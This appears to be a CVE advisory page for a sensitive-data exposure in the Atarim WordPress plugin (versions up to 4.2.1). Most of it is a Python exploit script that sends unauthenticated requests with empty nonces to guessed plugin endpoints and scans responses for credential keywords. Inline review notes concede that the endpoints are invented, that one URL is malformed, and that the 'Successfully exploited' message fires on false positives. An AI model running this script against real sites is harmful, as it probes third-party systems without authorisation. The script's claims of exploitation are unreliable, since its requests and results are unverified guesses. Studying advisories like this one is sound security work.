Security Vulnerability Report
CVE-2025-62895 CVSS 5.3 MEDIUM

CVE-2025-62895

Published: 2025-10-27 02:15:49
Last Modified: 2026-04-27 18:16:28

Description

Insertion of Sensitive Information Into Sent Data vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Retrieve Embedded Sensitive Data. This issue affects Atarim: from n/a through <= 4.2.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Atarim Visual Collaboration <= 4.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62895 PoC - Atarim Plugin Sensitive Information Exposure
# Affected Version: <= 4.2.1
# CVSS: 5.3 (Medium)
#
# NOTE(review): the advisory record for this CVE classifies the issue as
# CWE-201 (sensitive data sent to an unauthenticated network caller;
# vector AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). That record names no
# endpoint, AJAX action, REST route or parameter. Every request shape in
# this script is the script author's guess and is not confirmed by the
# advisory; a "hit" reported below is a prompt to inspect the response by
# hand, not evidence of exposure (see the keyword-matching note in the
# function body).
import requests
import json
import sys


def exploit_atarim_sensitive_data(target_url: str) -> "list[dict] | None":
    """Probe a WordPress site for the Atarim data-exposure issue CVE-2025-62895.

    Sends one request per (endpoint, parameter-set) pair and records every
    HTTP 200 response whose body contains any of a fixed keyword list.

    Args:
        target_url: Base URL of the site (scheme and host). A trailing
            slash is stripped before each endpoint path is appended.

    Returns:
        A list of result dicts with the keys ``endpoint``, ``param``,
        ``status``, ``sensitive_found`` and ``response_preview`` when at
        least one keyword matched, otherwise ``None`` (not an empty list —
        callers must test for ``None``). Request errors are printed and
        skipped, never raised.

    NOTE(review): ``json`` is imported but never used, and the ``"method"``
    key of the REST parameter sets is never read; both are dead weight.
    """
    print(f"[*] Target: {target_url}")
    print(f"[*] Exploiting CVE-2025-62895...")
    # Common Atarim AJAX endpoints
    # NOTE(review): admin-ajax.php is the standard WordPress AJAX entry
    # point; the two ``atarim/v1`` REST routes are assumed by the author and
    # do not appear in the advisory record on this page.
    endpoints = [
        "/wp-admin/admin-ajax.php",
        "/wp-json/atarim/v1/",
        "/?rest_route=/atarim/v1/"
    ]
    # Sensitive data retrieval parameters (identified from plugin code)
    # NOTE(review): "identified from plugin code" is the author's claim;
    # nothing on the advisory record backs these action names or keys.
    # Confirm them against the plugin source before treating any result
    # as meaningful.
    sensitive_params = [
        {"action": "atarim_get_config", "data": {"type": "all"}},
        {"action": "atarim_get_data", "data": {"resource_id": "*"}},
        {"endpoint": "config", "method": "GET"},
        {"endpoint": "settings", "method": "GET"}
    ]
    results: list[dict] = []
    for endpoint in endpoints:
        for param in sensitive_params:
            try:
                url = target_url.rstrip('/') + endpoint
                if "action" in param:
                    # AJAX request exploitation
                    data = {
                        "action": param["action"],
                        # Missing or weak nonce validation
                        # NOTE(review): author's assumption — a handler that
                        # verifies its nonce rejects an empty one, so a
                        # non-200 here says nothing about the vulnerability.
                        "nonce": ""
                    }
                    if "data" in param:
                        data.update(param["data"])
                    response = requests.post(url, data=data, timeout=10)
                else:
                    # REST API exploitation
                    # NOTE(review): plain concatenation — for the
                    # admin-ajax.php endpoint this produces
                    # ".../admin-ajax.phpconfig", a path that cannot exist;
                    # only the two REST prefixes (which end in "/") form a
                    # plausible URL.
                    api_url = url + param["endpoint"]
                    response = requests.get(api_url, timeout=10)
                # Check for sensitive data in response
                if response.status_code == 200:
                    content = response.text
                    # NOTE(review): bare substring match with no context.
                    # "key" and "auth" occur in ordinary WordPress HTML
                    # ("keywords", "author"), and "token"/"nonce"-style
                    # markup is common on any logged-out page, so a 200 from
                    # an unaffected site is very likely to be reported as
                    # "sensitive". The "Successfully exploited" message
                    # below is therefore not evidence of exposure.
                    sensitive_keywords = ["api_key", "secret", "token", "password", "credential", "auth", "key", "private"]
                    for keyword in sensitive_keywords:
                        if keyword.lower() in content.lower():
                            results.append({
                                "endpoint": endpoint,
                                "param": param,
                                "status": response.status_code,
                                "sensitive_found": keyword,
                                "response_preview": content[:500]
                            })
                            print(f"[!] Sensitive data detected: {keyword}")
                            print(f"[!] Endpoint: {endpoint}")
                            print(f"[>] Response preview: {content[:200]}...")
            except requests.RequestException as e:
                # Connection/timeout/HTTP-level errors are reported and the
                # next pair is tried; ``continue`` is redundant here since
                # nothing follows it in the loop body.
                print(f"[-] Request failed: {e}")
                continue
    if results:
        # Reached on any keyword match — see the false-positive note above.
        print(f"\n[+] Successfully exploited CVE-2025-62895!")
        print(f"[+] Found {len(results)} instances of sensitive data exposure")
        return results
    else:
        # "may be patched" is one of several explanations: the guessed
        # endpoints may simply not exist, or the site may not run the plugin.
        print(f"[-] No sensitive data found (target may be patched)")
        return None


if __name__ == "__main__":
    # CLI entry point: exactly one positional argument, the base URL.
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-62895_poc.py <target_url>")
        print("Example: python cve-2025-62895_poc.py http://example.com")
        sys.exit(1)
    target = sys.argv[1]
    exploit_atarim_sensitive_data(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62895", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:48.537", "lastModified": "2026-04-27T18:16:28.037", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Retrieve Embedded Sensitive Data.This issue affects Atarim: from n/a through <= 4.2.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-2-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}